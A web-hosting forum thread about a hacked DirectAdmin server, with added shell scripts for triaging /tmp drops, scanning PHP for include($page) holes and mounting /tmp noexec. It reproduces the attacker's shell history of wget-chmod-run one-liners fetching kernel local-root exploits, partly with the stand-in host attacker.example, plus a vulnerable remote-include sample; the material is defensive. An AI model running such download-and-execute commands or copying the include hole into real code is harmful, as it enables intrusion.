HELP Directadmin has been hacked!

ljweb
I just got hacked:

_RockLee was here! ( ex-xc0d3r3d) .//Hack0S Securty Solutions ; Brazilian Team

I can't log in to DirectAdmin, and Apache won't respond... what do I do?
 
If that is showing up on all web pages then I would place my odds on another service having been hacked, not DirectAdmin. Although it's entirely possible, I haven't heard of it happening through DirectAdmin; it has always been through a different service.

Can you log in via SSH? If not, the only way to check whether you lost everything is direct console access, and even that won't work if the root password has been changed.
If you don't have direct access you will need to get your datacenter technician to do it for you.
 
It only displays that when logging in to DirectAdmin via :2222. Apache stopped working; it won't start up. Trying to rebuild it now.
 
It won't build; this is the error:


/usr/bin/ld: cannot find -lltdl
collect2: ld returned 1 exit status
make: *** [libphp4.la] Error 1


Well, I got Apache going without PHP now. However, every index.html/index.htm/index.php has been replaced by the hacker's sig. This includes any DirectAdmin files. Is there any way of replacing the hacked DirectAdmin files?

Am I able to reinstall DirectAdmin on top of the existing installation to fix it?
 
Thanks, you're a lifesaver! There was already an update tar file there, which I installed, and it fixed up DA.
 
DirectAdmin uses normal HTML files in its theme, so at least the themes would have been affected by the hacker, or more likely by his script.
 
Yep, any file with the word index, default, home, etc. was hacked. I found iroffer in the /tmp folder; it was hidden in a folder called "...". It was owned by apache.
I removed it and took execute permissions off the temp folder.

How would it be possible for someone to get iroffer into the tmp folder? Would this have to be done via a hole in a PHP script?
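Sweeping /tmp for the kind of drop described in this post (a directory named "..." holding an iroffer binary owned by the web server user), as an added example that is not part of the original post: two find-based checks plus a function that archives what they find before anything is deleted, so the evidence survives the cleanup. The directory tree it runs on is constructed inside the script to stand in for /tmp (the file names iroffer and xhide are taken from the thread, their contents are dummies); on a real box you would point the functions at /tmp and /var/tmp as root.

```shell
#!/bin/sh
# Added example (not from the thread). Triage a world-writable directory such as
# /tmp for the classic drop pattern: dot-named hiding directories ("...", ".php")
# and executables that a web server user has no business owning.
# Usage on a live box (as root):  hidden_entries /tmp; executable_files /tmp

hidden_entries() {
    # Every entry below $1 whose basename starts with a dot. "..." is a
    # favourite because plain "ls" hides it and it looks like ".." at a glance.
    # %u:%M:%p = owner, permission string, path (GNU find).
    find "$1" -mindepth 1 -name '.*' -printf '%u:%M:%p\n' | sort
}

executable_files() {
    # Regular files with the owner execute bit set; in /tmp almost nothing
    # legitimate has it. Compare the owner column against the web server user.
    find "$1" -mindepth 1 -type f -perm -u+x -printf '%u:%M:%p\n' | sort
}

preserve_evidence() {
    # Capture the whole directory into a tarball before any rm -rf, so the
    # binaries can still be examined (strings, md5sum, ldd) or handed to the
    # datacenter/abuse desk. $1 = directory to capture, $2 = archive path.
    tar -czf "$2" -C "$1" .
}

# --- constructed demo tree standing in for /tmp (not real data from the thread) ---
DEMO_TMP=$(mktemp -d)
mkdir -p "$DEMO_TMP/..." "$DEMO_TMP/.php"
printf '#!/bin/sh\necho dummy iroffer\n' > "$DEMO_TMP/.../iroffer"
chmod 755 "$DEMO_TMP/.../iroffer"
printf '#!/bin/sh\necho dummy xhide\n' > "$DEMO_TMP/xhide"
chmod 777 "$DEMO_TMP/xhide"
: > "$DEMO_TMP/sess_0123456789"          # an ordinary PHP session file, not executable
EVIDENCE="$DEMO_TMP.evidence.tgz"

echo "== hidden entries =="
hidden_entries "$DEMO_TMP"
echo "== executables =="
executable_files "$DEMO_TMP"
preserve_evidence "$DEMO_TMP" "$EVIDENCE"
echo "== preserved in $EVIDENCE =="
tar -tzf "$EVIDENCE"
```

iroffer is an IRC DCC file server, so if it is still running, ps and netstat -anp will show the process and its outbound IRC connection; kill it before removing the files, and archive first, because the binary and its config are the best clue to what the box was being used for. An executable in /tmp owned by apache is the fingerprint of something that came in through the web server rather than through a shell login.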
 
ljweb said:
Yep, any file with the word index, default, home, etc. was hacked. I found iroffer in the /tmp folder; it was hidden in a folder called "...". It was owned by apache.
I removed it and took execute permissions off the temp folder.

How would it be possible for someone to get iroffer into the tmp folder? Would this have to be done via a hole in a PHP script?
Easy: have a user that has a piece of PHP like:
include($page);
without any validation of what $page contains. Furthermore, if you do this without register_globals, you have exactly what those script kiddies are looking for: a way to execute part of a script.
Then they make sure to lead the server to a prepared PHP page that wgets (most of them don't know any other way) a .tar.gz into your /tmp, then creates a dir in /tmp, after which it extracts the specially prepared iroffer into that dir and starts it.
If they are really lame, they leave a script somewhere that defaces sites...

(have had to deal with scriptkiddies before...)
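The include($page) pattern this reply describes, as an added example that is not part of the original thread: a small shell scanner that greps a web root for include/require statements whose argument is a variable, run over two constructed PHP files, one in the vulnerable shape and one that restricts the request to a fixed whitelist, to show what the scan flags and what it leaves alone. The web root, the file names and the evil.example host are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread). Hunt for the include($page) shape:
# include/require whose argument begins with a variable, so a request
# parameter can point it at a remote file.
# Usage on a live box:  scan_dynamic_includes /home/*/domains/*/public_html

scan_dynamic_includes() {
    # Heuristic: include|include_once|require|require_once, optional "(",
    # then "$" as the very first character of the argument. Output is
    # file:line:text. Literal-prefixed concatenations ('pages/' . $x) do not
    # match, so there are false negatives, and every hit still needs a human
    # to confirm whether the variable is validated before it is used.
    grep -rnE --include='*.php' --include='*.inc' --include='*.phtml' \
        '(^|[^A-Za-z0-9_])(include|require)(_once)?[[:space:]]*\(?[[:space:]]*\$' "$@" 2>/dev/null || true
}

count_flagged_files() {
    # Number of distinct files with at least one hit.
    scan_dynamic_includes "$1" | cut -d: -f1 | sort -u | wc -l | tr -d ' '
}

# --- constructed samples (not code from the thread) ---
DEMO_ROOT=$(mktemp -d)

# The vulnerable shape. With register_globals on, ?page=http://evil.example/x.txt
# sets $page directly; with it off, the second line reads the same thing from $_GET.
cat > "$DEMO_ROOT/vuln.php" <<'EOF'
<?php
include($page);
include($_GET['page']);
?>
EOF

# Hardened: the request only chooses a key in a fixed table; the path that
# reaches include is always one of two literal file names.
cat > "$DEMO_ROOT/safe.php" <<'EOF'
<?php
$pages = array('home' => 'home.php', 'about' => 'about.php');
$page  = isset($_GET['page']) ? $_GET['page'] : 'home';
if (!isset($pages[$page])) {
    $page = 'home';
}
include 'pages/' . $pages[$page];
?>
EOF

scan_dynamic_includes "$DEMO_ROOT"
echo "files needing review: $(count_flagged_files "$DEMO_ROOT")"
```

The whitelist version is the real fix: the user-controlled value never becomes a path, so neither a remote URL nor a ../ traversal can reach include. Turning register_globals off only changes where the attacker's value arrives from ($_GET instead of a bare $page); it does not close the hole.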
 
Well, there are more ways in than only including the $page variable. But it's the most common way in I know.

Did that /tmp thing require a reboot?
I've not installed it here myself, as I am kind of against rebooting servers that are running nicely.

edit: :eek: Reading is hard, don't answer my last question, I already know the answer... (it's right there in the article)
 
No, it doesn't require a reboot; you can mount it manually.
You also need to add it to /etc/fstab so it mounts automatically on the next reboot.
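Mounting /tmp noexec without a reboot and making it stick in /etc/fstab, as an added example that is not from the thread: the commands an admin would run as root for the two usual layouts (/tmp already a partition, or /tmp on the root file system and replaced by a loop-mounted image), plus a small checker that parses an fstab and reports whether the /tmp entry carries noexec,nosuid,nodev. The harden_* functions are defined but deliberately not run; the image path /usr/tmpDSK and its size are assumptions, and the fstab files the checker runs on are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the thread). Put /tmp on a noexec,nosuid,nodev mount
# without rebooting, and check /etc/fstab so it stays that way after one.
# All harden_* functions need root and are NOT executed below.

harden_tmp_remount() {
    # Case 1: /tmp is already its own partition. A remount flips the flags in place.
    mount -o remount,noexec,nosuid,nodev /tmp
}

harden_tmp_loop() {
    # Case 2: /tmp lives on the root file system. Build a file-backed file system
    # (assumed image path /usr/tmpDSK, 1 GB) and mount it over /tmp, keeping the
    # old contents. Then add the line printed by tmp_fstab_line to /etc/fstab.
    dd if=/dev/zero of=/usr/tmpDSK bs=1M count=1024
    mke2fs -j -F /usr/tmpDSK           # ext3; -F because the target is a file
    cp -pR /tmp /tmp.bak
    mount -o loop,noexec,nosuid,nodev /usr/tmpDSK /tmp
    chmod 1777 /tmp
    cp -pR /tmp.bak/. /tmp/
    rm -rf /tmp.bak
}

tmp_fstab_line() {
    printf '%s\n' '/usr/tmpDSK /tmp ext3 loop,noexec,nosuid,nodev 0 0'
}

fstab_tmp_options() {
    # Mount options of the active (uncommented) /tmp entry in the fstab at $1.
    awk '$1 !~ /^#/ && $2 == "/tmp" { print $4 }' "$1"
}

fstab_tmp_missing_opts() {
    # Prints "ok", "no /tmp entry", or "missing: <flags>" for the fstab at $1.
    opts=$(fstab_tmp_options "$1")
    if [ -z "$opts" ]; then
        echo "no /tmp entry"
        return 0
    fi
    missing=""
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="$missing$want " ;;
        esac
    done
    if [ -n "$missing" ]; then
        echo "missing: ${missing% }"
    else
        echo "ok"
    fi
}

verify_tmp_noexec() {
    # Live check (not run here): a script in /tmp must fail to exec once noexec is on.
    t=$(mktemp /tmp/noexec-test.XXXXXX)
    printf '#!/bin/sh\nexit 0\n' > "$t"; chmod 755 "$t"
    if "$t" 2>/dev/null; then echo "/tmp still executes"; else echo "/tmp is noexec"; fi
    rm -f "$t"
}

# --- constructed fstab samples (not from the thread) ---
FSTAB_BAD=$(mktemp); FSTAB_GOOD=$(mktemp); FSTAB_NONE=$(mktemp)
cat > "$FSTAB_BAD" <<'EOF'
LABEL=/      /      ext3  defaults                   1 1
/dev/sda3    /tmp   ext3  defaults                   1 2
EOF
cat > "$FSTAB_GOOD" <<'EOF'
LABEL=/      /      ext3  defaults                   1 1
# /dev/sda3  /tmp   ext3  defaults                   1 2
/usr/tmpDSK  /tmp   ext3  loop,noexec,nosuid,nodev   0 0
EOF
cat > "$FSTAB_NONE" <<'EOF'
LABEL=/      /      ext3  defaults                   1 1
EOF
fstab_tmp_missing_opts "$FSTAB_BAD"     # missing: noexec nosuid nodev
fstab_tmp_missing_opts "$FSTAB_GOOD"    # ok
fstab_tmp_missing_opts "$FSTAB_NONE"    # no /tmp entry
```

Do the same for /var/tmp (mount it the same way or make it a symlink into /tmp). The caveat: noexec stops the ./local24 step in a drop-and-run one-liner, but not sh /tmp/script or perl /tmp/script, and an attacker with a shell can simply use another writable directory. It is friction that breaks lazy automated drops, not a substitute for fixing the PHP hole they came in through and patching the kernel they are trying to escalate on.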
 
Well, I found the bash_history file with what was run:

id
df -h
w
uptime
uname -a
ps -x
pwd
cd /tmp/.php
cd /tmp
ls -la
cd ...
ls
wget http://www.xhide
chmod 777 xhide
wget http://iroffer.org/archive/v1.4/iroffer1.4.b02.tgz
tar -zxf iroffer1.4.b02.tgz
ls
cd iroffer1.4.b02
cd ..
wget http://www./local24
chmod local24;./local24
./local24
rm -rf local24
wget http://www./mremap_pte;chmod +x mremap_pte;./mremap_pte
rm -rf mr*
wget http://www./w00t;chmod 777 w00t;./w00t
rm -rf w00t
wget http://www.brk2;chmod 777 brk2;./brk2
rm -rf brk2
wget http://www.uselib24;chmod 777 uselib24;./uselib24;./uselib24;./uselib24;./uselib24

I won't post the actual address of where the scripts came from; it would probably give someone ideas. What kind of access would someone need to be able to do this?
 
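Pulling the drop-and-run pattern out of a shell history like the one posted above, as an added example that is not part of the original thread: what was fetched, which one-liners downloaded and executed in a single command, what was run and how often, and what was deleted afterwards. The history the script runs on is constructed for the demo: the hosts the poster redacted are replaced by the placeholder attacker.example, the iroffer URL is the public one he listed, and the command lines otherwise follow the shape of his post.

```shell
#!/bin/sh
# Added example (not from the thread). Triage a .bash_history for the
# fetch -> chmod -> execute -> delete pattern of a tool drop.
# Usage on a live box:  fetched_urls /home/<user>/.bash_history  (and so on)

fetched_urls() {
    # URLs handed to wget/curl/lynx/fetch, in order of appearance.
    grep -E '(^|[^A-Za-z])(wget|curl|lynx|fetch)([^A-Za-z]|$)' "$1" \
        | grep -oE '(https?|ftp)://[^[:space:];|&]+' || true
}

download_exec_chains() {
    # Lines that download something and run it in the same command:
    # the signature of a scripted drop rather than an interactive user.
    grep -E '(wget|curl)' "$1" | grep -E 'chmod|\./' || true
}

executed_binaries() {
    # Every "./name" invocation, most frequent first. "4 uselib24" means four
    # tries of the same binary on one line, the way race-condition exploits get retried.
    grep -oE '(^|[;&| ])\./[A-Za-z0-9_.-]+' "$1" \
        | sed 's#.*\./##' | sort | uniq -c | sort -rn | awk '{print $1, $2}' || true
}

cleanup_commands() {
    # Deletion of the tools after use; the names tell you what to look for in
    # process lists, cron entries and other writable directories.
    grep -E '(^|[;&| ])rm -rf' "$1" || true
}

# --- constructed history (hosts are placeholders, not the real ones) ---
HIST=$(mktemp)
cat > "$HIST" <<'EOF'
id
uname -a
cd /tmp
cd ...
wget http://attacker.example/xhide
chmod 777 xhide
wget http://iroffer.org/archive/v1.4/iroffer1.4.b02.tgz
tar -zxf iroffer1.4.b02.tgz
wget http://attacker.example/local24
chmod local24;./local24
./local24
rm -rf local24
wget http://attacker.example/mremap_pte;chmod +x mremap_pte;./mremap_pte
rm -rf mr*
wget http://attacker.example/w00t;chmod 777 w00t;./w00t
rm -rf w00t
wget http://attacker.example/brk2;chmod 777 brk2;./brk2
rm -rf brk2
wget http://attacker.example/uselib24;chmod 777 uselib24;./uselib24;./uselib24;./uselib24;./uselib24
EOF

echo "== fetched =="; fetched_urls "$HIST"
echo "== drop-and-run one-liners =="; download_exec_chains "$HIST"
echo "== executed (count name) =="; executed_binaries "$HIST"
echo "== cleaned up =="; cleanup_commands "$HIST"
```

Two things to read off a history like this. First, the opening id, uname -a and the sequence of binaries named after published Linux local-root exploits of that period (do_brk, do_mremap, uselib) is someone who already has an unprivileged shell, most likely the apache user that owned the iroffer drop, trying to become root by kernel version; the repeated runs do not tell you whether one eventually worked, which is why the format-and-restore advice later in the thread is the safe call. Second, .bash_history is written by the shell on exit and is trivially edited or disabled (unset HISTFILE), so its absence proves nothing and its presence only means the attacker was sloppy.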
Hi,

Try using chkrootkit to check for known rootkits. Most of them install patched ps, ls and many other programs so you can't find anything unusual.

Kind Regards,
 
Unless you are fully sure you haven't been root-compromised, I would do a box format and restore.
 
qlsys said:
Hi,

Try using chkrootkit to check for known rootkits. Most of them install patched ps, ls and many other programs so you can't find anything unusual.

Kind Regards,

Yep, already done that. I've installed chkrootkit and rkhunter and run both; everything comes up clean, and it tells me I should update a couple of things too.

I spent the last day going through everything and have removed all the suspicious files, even the extra user that they created.

I've since installed APF too, and it seems to be working well. I had no idea how many attempts there are at connecting to different UDP/TCP ports on my box, mainly from China and Amsterdam.
 